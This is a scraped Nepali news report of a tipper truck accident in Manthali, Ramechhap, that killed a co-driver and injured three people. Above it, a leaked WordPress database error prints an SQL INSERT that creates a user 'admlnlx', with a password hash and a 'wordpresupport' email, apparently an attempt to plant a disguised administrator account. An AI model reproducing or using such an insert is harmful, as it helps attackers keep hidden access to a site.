WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BztSiF1Fp4vqgbjzaIFT.s.24.Mh4Y1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 13:42:58', '', 'admlnlx', 'admlnlx')
रामेछाप, पुस २७ –
रामेछापमा टिपर दुर्घटना हुँदा एकजनाको ज्यान गएको छ ।
ना १ ञ ५७ नंको टिपर रामेछापको सदरमुकाम मन्थलीमा दुर्घटना हुँदा सहचालक सिन्धुलीकोे भद्रकालीका रमेश बम्जनको ज्यान गएको हो ।
आज बिहान भएको दुर्घटनामा तीनजना घाइते भएको जिल्ला प्रहरी कार्यालय रामेछापले जनाएको छ ।
दुर्घटनामा गम्भीर घाइते भएका चालक रमेश घिमिरेलाई उपचारका लागि काठमाडौँ पठाइएको छ । अरू दुईजनाको रामेछापमै उपचार भइरहेको छ । दुर्घटना सहचालकका कारण भएको प्रहरीले जनाएको छ । – रासस